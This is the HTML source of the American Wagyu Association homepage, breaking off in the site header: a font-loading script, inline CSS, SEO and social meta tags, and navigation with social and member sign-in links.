<!DOCTYPE html>
<html lang="en-US">

	<head>
		<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
		<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
		<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
		<link rel="manifest" href="/site.webmanifest">
		<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
		<meta name="msapplication-TileColor" content="#da532c">
		<meta name="theme-color" content="#ffffff">
		<meta charset="utf-8"/>
		<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover"/>
		<meta name="format-detection" content="telephone=no"/>
				

	<script>
		var script = document.createElement('script');
		script.src = '/dist/js/fontfaceobserver.js?id=1fa3921d078534b59916';
		script.async = true;
		script.onload = function () {
			Promise.all([
									new FontFaceObserver('Open Sans', {
						weight : 400,
						
					}).load(),
									new FontFaceObserver('Open Sans', {
						weight : 400,
						style : 'italic'
					}).load(),
									new FontFaceObserver('Open Sans', {
						weight : 700,
						
					}).load(),
									new FontFaceObserver('Open Sans', {
						weight : 700,
						style : 'italic'
					}).load(),
									new FontFaceObserver('Hurricane', {
						weight : 400,
						
					}).load(),
							]).then(function () {
				document.body.setAttribute('data-fonts-loaded', 'true');
				var date = new Date();
				date.setTime(date.getTime() + (365 * 24 * 60 * 60 * 1000));
				document.cookie = "fontsLoaded=true; expires=" + date.toGMTString() + "; path=/; samesite=strict";
			});
		};
		document.head.appendChild(script);
	</script>

		<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />

		<link rel="preload" as="style" href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,700;1,400;1,700&;family=Hurricane&display=swap" />

		<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,700;1,400;1,700&;family=Hurricane&display=swap" media="print" onload="this.media='all'" />

		<noscript>
		<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,700;1,400;1,700&;family=Hurricane&display=swap" />
	</noscript>

		<style title="criticalCss">/*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}main{display:block}h1{font-size:2em;margin:.67em 0}hr{-webkit-box-sizing:content-box;box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}img{border-style:none}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}legend{-webkit-box-sizing:border-box;box-sizing:border-box;color:inherit;display:table;max-width:100%;padding:0;white-space:normal}progress{vertical-align:baseline}textarea{overflow:auto}[type=checkbox],[type=radio]{-webkit-box-sizing:border-box;box-sizing:border-box;padding:0}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details{display:block}summary{display:list-item}[hidden],template{display:none}html{-webkit-box-sizing:border-box;box-sizing:border-box}*,:after,:before{-webkit-box-sizing:inherit;box-sizing:inherit}body #loading-overlay div{position:absolute;top:50%;left:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}@media(prefers-reduced-motion:no-preference){html{scroll-behavior:smooth}}html #widthREMs{width:72rem}html[data-font-size=lg] #widthREMs{width:108rem}html[data-font-size=xl] #widthREMs{width:144rem}body{color:#525252;font-family:Helvetica,Arial,sans-serif;line-height:1.5;overflow-x:hidden;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased}body[data-fonts-loaded=true]{font-family:Roboto,Helvetica,Arial,sans-serif}body #loading-overlay{display:none}body #loading-overlay div .spinner{display:block;-webkit-animation:rotator 1.4s linear infinite;animation:rotator 1.4s linear infinite}body #loading-overlay div .spinner .path{stroke:#000;stroke-dasharray:187;stroke-dashoffset:0;-webkit-transform-origin:center;transform-origin:center;-webkit-animation:dash 1.4s ease-in-out infinite;animation:dash 1.4s ease-in-out infinite}body.is-loading{overflow:hidden;cursor:wait}body.is-loading #loading-overlay{position:fixed;top:0;right:0;bottom:0;left:0;display:block;background-color:hsla(0,0%,100%,.75);cursor:wait;z-index:999999}a{color:#a71d35}@media(prefers-reduced-motion:no-preference){a{-webkit-transition:all .25s;transition:all .25s}}@media (-ms-high-contrast:none),screen and (-ms-high-contrast:active){img{-ms-interpolation-mode:bicubic}}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{color:#8e7557;line-height:1.2;font-weight:700}body[data-fonts-loaded=true] .h1,body[data-fonts-loaded=true] .h2,body[data-fonts-loaded=true] .h3,body[data-fonts-loaded=true] .h4,body[data-fonts-loaded=true] .h5,body[data-fonts-loaded=true] .h6,body[data-fonts-loaded=true] h1,body[data-fonts-loaded=true] h2,body[data-fonts-loaded=true] h3,body[data-fonts-loaded=true] h4,body[data-fonts-loaded=true] h5,body[data-fonts-loaded=true] h6{font-family:Roboto,Helvetica,Arial,sans-serif}.h1,h1{font-size:1.75rem;letter-spacing:.011em}@media(min-width:20rem){.h1,h1{font-size:calc(1.52273rem + 1.13636vw)}}@media(min-width:64rem){.h1,h1{font-size:2.25rem}}.h2,h2{font-size:1.4375rem;letter-spacing:.014em}@media(min-width:20rem){.h2,h2{font-size:calc(1.18182rem + 1.27841vw)}}@media(min-width:64rem){.h2,h2{font-size:2rem}}.h3,h3{font-size:1.5rem;letter-spacing:.018em;font-family:Roboto,Helvetica,Arial,sans-serif}@media(min-width:20rem){.h3,h3{font-size:calc(1.38636rem + .56818vw)}}@media(min-width:64rem){.h3,h3{font-size:1.75rem}}.h4,h4{font-size:1.25rem;letter-spacing:.021em;font-family:Roboto,Helvetica,Arial,sans-serif!important}@media(min-width:20rem){.h4,h4{font-size:calc(1.13636rem + .56818vw)}}@media(min-width:64rem){.h4,h4{font-size:1.5rem}}.h5,h5{font-size:1.125rem;letter-spacing:.025em}@media(min-width:20rem){.h5,h5{font-size:calc(1.06818rem + .28409vw)}}@media(min-width:64rem){.h5,h5{font-size:1.25rem}}.h6,h6{font-size:1rem;letter-spacing:.028em}@media(min-width:20rem){.h6,h6{font-size:calc(.94318rem + .28409vw)}}@media(min-width:64rem){.h6,h6{font-size:1.125rem}}blockquote{max-width:62rem;position:relative;margin:2.5rem auto;padding:0 1rem 0 5.25rem;color:inherit;font-style:italic;font-weight:400;font-size:1.25rem;font-family:inherit;line-height:1.34375}@media(min-width:20rem){blockquote{font-size:calc(.875rem + 1.875vw)}}@media(min-width:60rem){blockquote{font-size:2rem}}blockquote strong{font-weight:400}blockquote:before{content:url(/dist/svgs/quote.svg);position:absolute;top:1rem;left:0}ol li,ul li{margin-bottom:.5rem}.shadow{position:absolute;width:100%;height:100%;opacity:.25;background-image:-webkit-gradient(linear,left top, left bottom,color-stop(100%, #151515),color-stop(0, #000));background-image:linear-gradient(180deg,#151515 100%,#000 0);top:0;left:0}.maxwidth{max-width:77rem;margin-right:auto;margin-left:auto;padding:0 1rem}#alert{position:relative;display:-webkit-box;display:flex;width:100%;font-size:.875rem;line-height:1.3571428571;background-color:#7aaecc}#alert a:not(.close),#alert div{-webkit-box-flex:1;flex:1 1 100%;padding:1rem;color:#fff;font-weight:400;text-decoration:none}#alert a:not(.close) strong,#alert div strong{margin-right:.75rem;font-weight:600;font-size:1rem;text-transform:uppercase}#alert .close{-webkit-box-flex:0;flex:0 0 auto;display:-webkit-box;display:flex;-webkit-box-pack:center;justify-content:center;-webkit-box-align:center;align-items:center;padding:0 1rem;text-decoration:none;background-color:rgba(0,0,0,.24)}#alert .close svg{display:block;width:1rem;height:1rem;fill:#fff}#alert .close:focus,#alert .close:hover{background-color:rgba(0,0,0,.48)}#alert.urgent{background-color:#c7031e}#alert.informational{background-color:#85c169}.site-header{height:7rem;position:absolute;top:0;width:100%;z-index:999;border-bottom:1px solid #fff;background:#000}@media(min-width:72rem){.site-header{height:8.75rem}}.site-header .site-nav{max-width:77rem;margin-right:auto;margin-left:auto;position:relative;z-index:100;display:-webkit-box;display:flex;-webkit-box-pack:end;justify-content:flex-end;-webkit-box-align:end;align-items:flex-end;height:inherit;padding:.625rem 1rem 1.25rem}@media(min-width:72rem){.site-header .site-nav{-webkit-box-pack:center;justify-content:center;padding-bottom:0}}.site-header .site-nav .social-icons{padding-left:1rem;padding-right:1rem;display:-webkit-box;display:flex;flex-wrap:wrap}@media(min-width:72rem){.site-header .site-nav .social-icons{position:absolute;left:1.3125rem;top:2.625rem;z-index:200}}@media(max-width:72rem){.site-header .site-nav .social-icons{display:none}}.site-header .site-nav .social-icons .social-icon{margin-bottom:.5rem;cursor:pointer;border:2px solid #fff;border-radius:50%;background:#000;position:relative;width:43px;height:43px}.site-header .site-nav .social-icons .social-icon:not(:last-child){margin-right:.5rem}.site-header .site-nav .social-icons .social-icon img{width:2rem;height:2rem;padding:.15rem;-o-object-fit:contain;object-fit:contain;position:absolute;top:50%;left:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}.site-header .site-nav .sign-ins{display:none}@media(min-width:72rem){.site-header .site-nav .sign-ins{display:block;position:absolute;right:2.3125rem;top:2.625rem;z-index:200;font-size:.75rem}}.site-header .site-nav .sign-ins a{color:#fff;border:1px solid #fff;padding:.5rem 1rem;text-decoration:none}.site-header .site-nav .sign-ins a:not(:last-child){margin-right:1.25rem}.site-header .site-nav .sign-ins svg{margin-right:.5rem;position:relative;top:.15rem}.site-header .site-nav .logo-wrapper{width:13.75rem;height:6.25rem;position:relative;margin:0 auto}.site-header .site-nav .logo{margin-right:auto;padding-right:1rem;display:none}@media(min-width:72rem){.site-header .site-nav .logo{display:-webkit-inline-box;display:inline-flex;padding-right:0;position:absolute;z-index:2000;left:50%;top:-1.25rem;-webkit-transform:translateX(-50%);transform:translateX(-50%);width:100%}}.site-header .site-nav .logo svg{width:100%;height:100%}.site-header .site-nav .logo.mobile{display:-webkit-box;display:flex;margin-top:auto;width:10rem}@media(min-width:72rem){.site-header .site-nav .logo.mobile{display:none!important}}.site-header .site-nav .search-icon{display:none}@media(min-width:72rem){.site-header .site-nav .search-icon{display:inline-block}}.site-header .site-nav .search-icon-mobile{display:block;position:relative;top:.1rem}@media(min-width:72rem){.site-header .site-nav .search-icon-mobile{display:none}}.site-header .site-nav .toggle.child{background-color:#fff}.site-header .site-nav .toggle.menu{display:block;padding:1.25rem 1rem 0;text-decoration:none;cursor:pointer}@media(min-width:72rem){.site-header .site-nav .toggle.menu{display:none}}.site-header .site-nav .toggle.menu svg{-webkit-transition:all .25s;transition:all .25s;fill:#fff;display:block;width:1.625rem;height:1.625rem}.site-header .site-nav .toggle.menu.on svg,.site-header .site-nav .toggle.menu:focus svg,.site-header .site-nav .toggle.menu:hover svg{fill:#e0e0e0}.site-header .site-menu{position:absolute;top:100%;left:0;width:100%;z-index:110;white-space:nowrap;-webkit-transform:scaleY(0);transform:scaleY(0);-webkit-transform-origin:50% 0;transform-origin:50% 0;-webkit-box-shadow:3px 3px 10px 3px rgba(0,0,0,.2);box-shadow:3px 3px 10px 3px rgba(0,0,0,.2)}@media(prefers-reduced-motion:no-preference){.site-header .site-menu{-webkit-transition:all .25s ease-in-out;transition:all .25s ease-in-out}}@media(min-width:72rem){.site-header .site-menu{position:relative;top:auto;display:block!important;width:auto;border-bottom:0;overflow:visible!important;width:100%;-webkit-box-shadow:none;box-shadow:none;-webkit-transform:scaleY(1);transform:scaleY(1)}}.site-header .site-menu.on{-webkit-transform:scaleY(1);transform:scaleY(1)}.site-header .site-menu ul{list-style:none;margin:0;padding:0;width:100%}@media(min-width:72rem){.site-header .site-menu ul{display:-webkit-inline-box;display:inline-flex;-webkit-box-align:end;align-items:flex-end}}.site-header .site-menu ul li{display:block;margin:0}@media(min-width:72rem){.site-header .site-menu ul li.on{color:#fff;background-color:transparent}}.site-header .site-menu ul li.has-children{display:-webkit-box;display:flex;flex-wrap:wrap}.site-header .site-menu ul li.has-children.on .carrot{position:relative}@media(min-width:72rem){.site-header .site-menu ul li.has-children.on .carrot:before{position:absolute;content:"";height:1.25rem;width:1.25rem;background:#fff;top:4.5rem;left:50%;-webkit-transform:rotate(45deg) translateX(-50%);transform:rotate(45deg) translateX(-50%)}}.site-header .site-menu ul li.has-children>a:not(.toggle){-webkit-box-flex:1;flex:1 1 auto;width:calc(100% - 3rem);max-width:calc(100% - 3rem)}@media(min-width:72rem){.site-header .site-menu ul li.has-children>a:not(.toggle){width:100%;max-width:100%}}.site-header .site-menu ul li.has-children a.toggle{-webkit-box-flex:1;flex:1 1 auto;display:-webkit-box;display:flex;-webkit-box-pack:center;justify-content:center;-webkit-box-align:center;align-items:center;width:3rem;max-width:3rem;padding:0;border-bottom:1px solid #86949f;border-left:1px solid #86949f;cursor:pointer;-webkit-transition:all .25s;transition:all .25s}@media(min-width:72rem){.site-header .site-menu ul li.has-children a.toggle{display:none}}.site-header .site-menu ul li.has-children a.toggle svg{-webkit-box-flex:1;flex:1 1 auto;width:1.125rem;height:1.125rem;-webkit-transition:all .25s;transition:all .25s}.site-header .site-menu ul li.has-children a.toggle svg path{fill:#000}.site-header .site-menu ul li.has-children a.toggle:focus,.site-header .site-menu ul li.has-children a.toggle:hover{background-color:#a71d35}.site-header .site-menu ul li.has-children a.toggle:focus svg path,.site-header .site-menu ul li.has-children a.toggle:hover svg path{fill:#fff}.site-header .site-menu ul li.has-children .child-menu{-webkit-box-flex:1;flex:1 1 100%;display:none}@media(min-width:72rem){.site-header .site-menu ul li.has-children .child-menu{position:absolute;top:5.25rem;left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%);width:calc(100% - 2rem);padding-top:1rem;max-width:70rem}}.site-header .site-menu ul li.has-children .child-menu .wrapper{display:-webkit-box;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;flex-direction:column}@media(min-width:72rem){.site-header .site-menu ul li.has-children .child-menu .wrapper{padding:2.125rem 5rem 1rem;background:#fff;-webkit-box-shadow:4px 5px 15px 0 rgba(0,0,0,.14);box-shadow:4px 5px 15px 0 rgba(0,0,0,.14);border-radius:4px}}.site-header .site-menu ul li.has-children .child-menu .wrapper .inner{display:-webkit-box;display:flex}.site-header .site-menu ul li.has-children .child-menu .wrapper ul{-webkit-box-flex:1;flex:1 1 50%;display:block}@media(min-width:72rem){.site-header .site-menu ul li.has-children .child-menu .wrapper ul{padding-bottom:1.25rem}}@media(max-width:72rem){.site-header .site-menu ul li.has-children .child-menu .wrapper ul{-webkit-column-count:1!important;-moz-column-count:1!important;column-count:1!important}}.site-header .site-menu ul li.has-children .child-menu .wrapper ul li{position:relative;display:block}.site-header .site-menu ul li.has-children .child-menu .wrapper ul li.has-children{display:-webkit-box;display:flex;flex-wrap:wrap}.site-header .site-menu ul li.has-children .child-menu .wrapper ul li a:not(.toggle){padding-left:2.6875rem}@media(min-width:72rem){.site-header .site-menu ul li.has-children .child-menu .wrapper ul li a:not(.toggle){background:#fff;color:#525252;padding:.5rem 0}}.site-header .site-menu ul li.has-children .child-menu .wrapper ul li a:not(.toggle):focus,.site-header .site-menu ul li.has-children .child-menu .wrapper ul li a:not(.toggle):hover{color:#fff;cursor:pointer}@media(min-width:72rem){.site-header .site-menu ul li.has-children .child-menu .wrapper ul li a:not(.toggle):focus,.site-header .site-menu ul li.has-children .child-menu .wrapper ul li a:not(.toggle):hover{color:#a71d35}}@media(min-width:72rem){.site-header .site-menu ul li.has-children .child-menu .wrapper ul li ul{top:-1px;left:100%}}.site-header .site-menu ul li.has-children .child-menu .wrapper ul li ul li a:not(.toggle){padding-left:4rem}@media(min-width:72rem){.site-header .site-menu ul li.has-children .child-menu .wrapper ul li ul li a:not(.toggle){padding:.75rem 1.25rem}}.site-header .site-menu ul li.has-children .child-menu .wrapper ul li a{color:#525252}.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-content{display:none}@media(min-width:72rem){.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-content{-webkit-box-flex:1;flex:1 1 50%;display:-webkit-box;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;flex-direction:column;padding-bottom:1.25rem;min-width:15.625rem}}.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-content .row{padding:0;margin-left:1.25rem}.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-content .row .content p{margin:.875rem 0;color:#7a552c}.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-event{display:none}@media(min-width:72rem){.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-event{display:-webkit-box;display:flex;-webkit-box-align:start;align-items:flex-start;flex-basis:100%;padding-top:1.25rem;border-top:1px solid #d8d8d8}}.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-event .event-info{margin-right:1.25rem}.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-event .title{color:#525252}.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-event .location{color:#858585;font-size:.875rem;margin-top:0;display:-webkit-box;display:flex}.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-event a{max-height:3.75rem}.site-header .site-menu ul li.has-children .child-menu .wrapper .featured-event .btn-container{margin-left:auto}.site-header .site-menu ul li a{display:block;padding:.75rem 1.375rem;font-weight:400;text-decoration:none;border-bottom:1px solid #fff;color:#000;background:#fff}@media(min-width:72rem){.site-header .site-menu ul li a{color:#fff;padding:.75rem 1.3125rem 1.25rem;white-space:nowrap;border-bottom:0;background:none}}.site-header .site-menu ul li a:focus,.site-header .site-menu ul li a:hover{color:#fff;background-color:#a71d35;cursor:pointer}@media(min-width:72rem){.site-header .site-menu ul li a:focus,.site-header .site-menu ul li a:hover{background:none}}.site-header .site-menu ul li.has-children.on>a.toggle svg{-webkit-transform-origin:50% 50%;transform-origin:50% 50%;-webkit-transform:rotate(180deg);transform:rotate(180deg)}@media(min-width:72rem){.site-header .site-menu .sign-ins-mobile{display:none}}.site-header .site-menu .sign-ins-mobile svg{margin-right:.5rem}.sticky{position:sticky!important}.sticky .social-icons{display:none!important}.homepage-banner picture{position:absolute;top:0;right:0;bottom:0;left:0;z-index:-1}.homepage-banner picture img{width:100%;height:100%;-o-object-fit:cover;object-fit:cover}.homepage-banner picture:before{content:"";position:absolute;top:0;right:0;bottom:0;left:0;background-image:-webkit-gradient(linear,left top, left bottom,color-stop(100%, #151515),color-stop(0, #000));background-image:linear-gradient(180deg,#151515 100%,#000 0);opacity:.3}.homepage-banner figure{position:absolute;top:0;right:0;bottom:0;left:0;overflow:hidden;z-index:-1}.homepage-banner figure video{-o-object-fit:cover;object-fit:cover;position:absolute;top:50%;left:50%;min-width:100%;min-height:100%;z-index:2;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}.homepage-banner figure:before{content:"";position:absolute;top:0;right:0;bottom:0;left:0;background-image:-webkit-gradient(linear,left top, left bottom,color-stop(100%, #151515),color-stop(0, #000));background-image:linear-gradient(180deg,#151515 100%,#000 0);opacity:.3;z-index:3}.homepage-banner .banner-text{max-width:60rem;margin-right:auto;margin-left:auto;width:100%;padding:10rem 1rem .25rem}@media(min-width:50rem){.homepage-banner .banner-text{padding-top:15rem}}.homepage-banner .banner-text h1{font-family:Hurricane,cursive!important;font-weight:400;margin:0 0 1.375rem;width:100%;font-size:3rem;color:#fff}@media(min-width:20rem){.homepage-banner .banner-text h1{font-size:calc(2.09091rem + 4.54545vw)}}@media(min-width:64rem){.homepage-banner .banner-text h1{font-size:5rem}}@media(min-width:50rem){.homepage-banner .banner-text h1{width:75%}}.homepage-banner .banner-text p{width:100%;margin-top:1.375rem;margin-bottom:2rem;color:#fff;font-size:1.5rem}@media(min-width:20rem){.homepage-banner .banner-text p{font-size:calc(1.38636rem + .56818vw)}}@media(min-width:64rem){.homepage-banner .banner-text p{font-size:1.75rem}}@media(min-width:50rem){.homepage-banner .banner-text p{width:50%;margin-bottom:6.25rem}}.homepage-banner .banner-users{max-width:60rem;margin-right:auto;margin-left:auto;width:100%;margin-top:1.5rem;padding:0 1rem 1rem}@media(min-width:50rem){.homepage-banner .banner-users{padding-bottom:2.5rem}}.homepage-banner .banner-users .users{display:grid;display:-webkit-box;display:flex;flex-wrap:wrap;margin-right:-.9375rem;margin-left:-.9375rem;-webkit-box-pack:center;justify-content:center}.homepage-banner .banner-users .users>*{display:block;width:calc(100% - 1.875rem);margin-right:.9375rem;margin-left:.9375rem;margin-bottom:1.875rem}@media(min-width:20rem){.homepage-banner .banner-users .users>*{-webkit-box-flex:1;flex:1 1 auto;width:calc(99.99% - 1.87481rem);max-width:calc(99.99% - 1.87481rem)}}@media(min-width:40rem){.homepage-banner .banner-users .users>*{-webkit-box-flex:1;flex:1 1 auto;width:calc(49.9975% - 1.87491rem);max-width:calc(49.9975% - 1.87491rem)}}@media(min-width:50rem){.homepage-banner .banner-users .users>*{-webkit-box-flex:1;flex:1 1 auto;width:calc(33.33222% - 1.87494rem);max-width:calc(33.33222% - 1.87494rem)}}@media(min-width:50rem){.homepage-banner .banner-users .users{flex-wrap:nowrap;display:-webkit-box;display:flex;max-width:none;margin:0;grid-column-gap:.5rem}}.homepage-banner .banner-users .users .user-single{display:-webkit-box;display:flex;height:6.5rem;position:relative;text-decoration:none;color:#525252;border:1px solid #a71d35;font-size:1.25rem}@media(min-width:50rem){.homepage-banner .banner-users .users .user-single{border:none}}.homepage-banner .banner-users .users .user-single .color-fill{background-color:#cb9b65;width:2.375rem;border-radius:2px}.homepage-banner .banner-users .users .user-single .spacer{width:2px!important;height:100%}.homepage-banner .banner-users .users .user-single .white-fill{background-color:#fff;width:100%;border-radius:2px;-webkit-transition:all .25s ease-in-out;transition:all .25s ease-in-out}.homepage-banner .banner-users .users .user-single .icon{position:absolute;bottom:0;left:0}.homepage-banner .banner-users .users .user-single .icon img{position:absolute;bottom:0;width:4.5rem;height:4rem;-webkit-transition:all .25s ease-in-out;transition:all .25s ease-in-out}.homepage-banner .banner-users .users .user-single p{color:#525252;width:75%;margin:.875rem 2.5rem 0 1.75rem;font-weight:700}.homepage-banner .banner-users .users .user-single p+svg{position:absolute;right:.875rem;bottom:.625rem}.homepage-banner .banner-users .users .user-single:hover .white-fill{background-color:#e0e0e0}.homepage-banner .banner-users .users .user-single:hover .icon img{width:5rem;height:5rem}
</style>
		<link rel="preload" as="style" href="/dist/css/app.css?id=87ec8b96c4578d52feba" />
		<link rel="stylesheet" href="/dist/css/app.css?id=87ec8b96c4578d52feba" media="print" onload="this.media='all'" />
		<noscript><link rel="stylesheet" href="/dist/css/app.css?id=87ec8b96c4578d52feba" /></noscript>
	<title>The Finest Beef in the US | American Wagyu Association</title><meta name="description" content="The best beef is the marbled beef of a wagyu cow. We have everything you need to buy, produce, and promote American Wagyu beef.">
<meta name="referrer" content="no-referrer-when-downgrade">
<meta name="robots" content="all">
<meta content="en_US" property="og:locale">
<meta content="American Wagyu Association" property="og:site_name">
<meta content="website" property="og:type">
<meta content="https://wagyu.org/" property="og:url">
<meta content="The Finest Beef in the US | American Wagyu Association" property="og:title">
<meta content="The best beef is the marbled beef of a wagyu cow. We have everything you need to buy, produce, and promote American Wagyu beef." property="og:description">
<meta content="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Pages/Home/_1200x630_crop_center-center_82_none/wagyu-beef.jpg?mtime=1624647553" property="og:image">
<meta content="1200" property="og:image:width">
<meta content="630" property="og:image:height">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:creator" content="@">
<meta name="twitter:title" content="The Finest Beef in the US | American Wagyu Association">
<meta name="twitter:description" content="The best beef is the marbled beef of a wagyu cow. We have everything you need to buy, produce, and promote American Wagyu beef.">
<meta name="twitter:image" content="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Pages/Home/_800x418_crop_center-center_82_none/wagyu-beef.jpg?mtime=1624647553">
<meta name="twitter:image:width" content="800">
<meta name="twitter:image:height" content="418">
<meta name="google-site-verification" content="u4Wt5yCHdlkMGWc1uEeaRuFsr0gUs6RVFEldv8mCCrs">
<link href="https://wagyu.org" rel="canonical">
<link href="https://wagyu.org" rel="home">
<link type="text/plain" href="https://wagyu.org/humans.txt" rel="author">
<style>button[type=submit].ff-loading{display:inline-flex;flex-wrap:nowrap;align-items:center}button[type=submit].ff-loading:before{content:"";display:block;flex:1 0 11px;width:11px;height:11px;margin-right:10px;border-style:solid;border-width:2px;border-color:transparent transparent #fff #fff;border-radius:50%;animation:ff-loading .5s linear infinite}@keyframes ff-loading{0%{transform:rotate(0)}100%{transform:rotate(1turn)}}.freeform-pages{display:flex;padding:0;margin:0 0 10px;list-style:none}.freeform-pages li{margin:0 10px 0 0}.freeform-row{display:flex;justify-content:space-between;margin:0 -15px}.freeform-row .freeform-column{flex:1 0;padding:10px 0;margin:0 15px;box-sizing:border-box}.freeform-row .freeform-column>.freeform-row:first-child{margin-top:-10px}.freeform-row .freeform-column label{display:block}.freeform-row .freeform-column .input-group-one-line{display:flex;flex-wrap:wrap}.freeform-row .freeform-column .input-group-one-line label{padding-right:10px}.freeform-row .freeform-column .freeform-label{font-weight:bold}.freeform-row .freeform-column .freeform-label.freeform-required:after{content:"*";margin-left:5px;color:red}.freeform-row .freeform-column .freeform-input{width:100%;display:block;box-sizing:border-box}.freeform-row .freeform-column .freeform-input[type=checkbox],.freeform-row .freeform-column .freeform-input[type=radio]{width:auto;display:inline;margin-right:5px}.freeform-row .freeform-column .freeform-input.StripeElement{padding:4px 2px;border:1px solid #ccc;height:30px}.freeform-row .freeform-column .freeform-input-only-label{font-weight:normal}.freeform-row .freeform-column .freeform-input-only-label>.freeform-input{display:inline-block;width:auto;margin-right:5px}.freeform-row .freeform-column .freeform-errors,.freeform-row .freeform-column .ff-errors{list-style:none;padding:0;margin:5px 0 0}.freeform-row .freeform-column .freeform-errors>li,.freeform-row .freeform-column .ff-errors>li{color:red}.freeform-row .freeform-column .freeform-instructions{margin:0 0 5px;font-size:13px;color:#aba7a7}.freeform-row .freeform-column.freeform-column-content-align-left{display:flex;justify-content:flex-start}.freeform-row .freeform-column.freeform-column-content-align-left>button:not(:first-of-type){margin-left:5px}.freeform-row .freeform-column.freeform-column-content-align-center{display:flex;justify-content:center}.freeform-row .freeform-column.freeform-column-content-align-center>button:not(:first-of-type){margin-left:5px}.freeform-row .freeform-column.freeform-column-content-align-right{display:flex;justify-content:flex-end}.freeform-row .freeform-column.freeform-column-content-align-right>button:not(:first-of-type){margin-left:5px}.freeform-row .freeform-column.freeform-column-content-align-spread{display:flex;justify-content:space-between}.freeform-row .freeform-column.freeform-column-content-align-spread>button:not(:first-of-type){margin-left:5px}.ff-form-errors{padding:15px;border:1px solid #f5c6cb;background:#f8d7da;border-radius:5px;color:#721c24}.ff-form-errors>p{margin:0}.freeform-form-has-errors{color:#721c24}
</style></head>
	<body data-fonts-loaded="false" onload="setTimeout(showEmailPopup, 2000)">
				
				
							<header class="site-header" id="site-header">
								<nav class="site-nav">
					<div class="social-icons">
													<a class="social-icon" href="https://www.instagram.com/americanwagyu/" target="_blank">
								<img src="/dist/svgs/brands/instagram.svg" alt="instagram"/>
							</a>
													<a class="social-icon" href="https://www.facebook.com/Wagyu.org" target="_blank">
								<img src="/dist/svgs/brands/facebook.svg" alt="facebook"/>
							</a>
											</div>
					<div class="sign-ins">
						<a href="https://wagyu.digitalbeef.com/" target="_blank">
							<svg width="12" height="15" viewBox="0 0 12 15" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M9.844 5.625h-.469V3.75A3.754 3.754 0 005.625 0a3.754 3.754 0 00-3.75 3.75v1.875h-.469C.631 5.625 0 6.255 0 7.031v6.563C0 14.369.631 15 1.406 15h8.438c.775 0 1.406-.63 1.406-1.406V7.03c0-.775-.631-1.406-1.406-1.406zM3.125 3.75c0-1.379 1.121-2.5 2.5-2.5s2.5 1.121 2.5 2.5v1.875h-5V3.75zm3.125 6.701v1.424a.625.625 0 11-1.25 0v-1.424a1.246 1.246 0 01.625-2.326 1.246 1.246 0 01.625 2.326z" fill="#FFF"/></svg> DigitalBeef Sign In
						</a>
												<a href="/member-sign-in">
							<svg width="12" height="15" viewBox="0 0 12 15" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M9.844 5.625h-.469V3.75A3.754 3.754 0 005.625 0a3.754 3.754 0 00-3.75 3.75v1.875h-.469C.631 5.625 0 6.255 0 7.031v6.563C0 14.369.631 15 1.406 15h8.438c.775 0 1.406-.63 1.406-1.406V7.03c0-.775-.631-1.406-1.406-1.406zM3.125 3.75c0-1.379 1.121-2.5 2.5-2.5s2.5 1.121 2.5 2.5v1.875h-5V3.75zm3.125 6.701v1.424a.625.625 0 11-1.25 0v-1.424a1.246 1.246 0 01.625-2.326 1.246 1.246 0 01.625 2.326z" fill="#FFF"/></svg> Members Only
						</a>
					</div>
